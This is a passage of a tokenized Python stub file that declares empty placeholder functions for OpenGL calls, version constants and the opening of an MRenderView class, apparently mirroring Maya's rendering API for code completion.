<EOL> def glLoadMatrixf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadName ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixd ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixdARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixfARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glLockArraysEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glLogicOp ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMaterialf ( * args , ** kwargs ) : <EOL> pass <EOL> def glMaterialfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMateriali ( * args , ** kwargs ) : <EOL> pass <EOL> def glMaterialiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMatrixMode ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultMatrixd ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultMatrixf ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixd ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixdARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixf ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixfARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiDrawArrays ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiDrawElements ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNewList ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3b ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormalPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glOrtho ( * args , ** kwargs ) : <EOL> pass <EOL> def glPNTrianglesfATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glPNTrianglesiATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glPassTexCoordATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glPassThrough ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelMapfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelMapuiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelMapusv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelStoref ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelStorei ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelTransferf ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelTransferi ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelZoom ( * args , ** kwargs ) : <EOL> pass <EOL> def glPointParameterf ( * args , ** kwargs ) : <EOL> pass <EOL> def glPointParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPointSize ( * args , ** kwargs ) : <EOL> pass <EOL> def glPolygonMode ( * args , ** kwargs ) : <EOL> pass <EOL> def glPolygonOffset ( * args , ** kwargs ) : <EOL> pass <EOL> def glPolygonStipple ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopClientAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopName ( * args , ** kwargs ) : <EOL> pass <EOL> def glPrimitiveRestartIndexNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glPrimitiveRestartNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glPrioritizeTextures ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameters4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameters4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramString ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushClientAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushName ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glReadBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glReadPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectd ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectf ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRecti ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRects ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectsv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRenderMode ( * args , ** kwargs ) : <EOL> pass <EOL> def glRenderbufferStorageEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glRequestResidentProgramsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glRotated ( * args , ** kwargs ) : <EOL> pass <EOL> def glRotatef ( * args , ** kwargs ) : <EOL> pass <EOL> def glSampleCoverage ( * args , ** kwargs ) : <EOL> pass <EOL> def glSampleMapATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glScaled ( * args , ** kwargs ) : <EOL> pass <EOL> def glScalef ( * args , ** kwargs ) : <EOL> pass <EOL> def glScissor ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3bEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3bvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3dEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3dvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3fEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3fvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3iEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3ivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3sEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3svEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3ubEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3ubvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3uiEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3uivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3usEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3usvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColorPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSelectBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetFragmentShaderConstantATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetInvariantEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetLocalConstantEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glShadeModel ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderOp1EXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderOp2EXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderOp3EXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderSourceARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glStencilFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glStencilMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glStencilOp ( * args , ** kwargs ) : <EOL> pass <EOL> def glSwizzleEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glTestFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoordPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnvf ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnvfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnvi ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnviv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGend ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGendv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGenf ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGenfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGeni ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGeniv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameterf ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameteri ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameteriv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexSubImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexSubImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexSubImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTrackMatrixNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glTransformFeedbackAttribsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glTransformFeedbackVaryingsEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glTransformFeedbackVaryingsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glTranslated ( * args , ** kwargs ) : <EOL> pass <EOL> def glTranslatef ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniformMatrix2fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniformMatrix3fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniformMatrix4fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUnlockArraysEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glUnmapBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUseProgramObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glValidateProgramARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantbvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantdvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantsvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantubvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantuivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantusvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexArrayRangeNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nbv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Niv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nsv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nub ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nuiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nusv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4ubNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4ubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4ubvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4uiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4usv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribPointerNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs1dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs1fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs1svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs2dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs2fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs2svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs3dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs3fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs3svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4ubvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexWeightPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexWeightfEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexWeightfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glViewport ( * args , ** kwargs ) : <EOL> pass <EOL> def glWriteMaskEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def maxTextureSize ( * args , ** kwargs ) : <EOL> pass <EOL> def maxVertexAttributes ( * args , ** kwargs ) : <EOL> pass <EOL> def numTexImageUnits ( * args , ** kwargs ) : <EOL> pass <EOL> def numTexInterpolants ( * args , ** kwargs ) : <EOL> pass <EOL> def numTexUnits ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kMGL_Version11 = <NUM_LIT:0> <EOL> kMGL_Version12 = <NUM_LIT:1> <EOL> kMGL_Version121 = <NUM_LIT:2> <EOL> kMGL_Version13 = <NUM_LIT:3> <EOL> kMGL_Version14 = <NUM_LIT:4> <EOL> kMGL_Version15 = <NUM_LIT:5> <EOL> kMGL_Version20 = <NUM_LIT:6> <EOL> class MRenderView ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def doesRenderEditorExist ( * args , ** kwargs ) : <EOL> pass <EOL> def endRender ( * args , ** kwargs ) : <EOL> pass <EOL> def getRenderRegion ( * args , ** kwargs ) : <EOL> pass 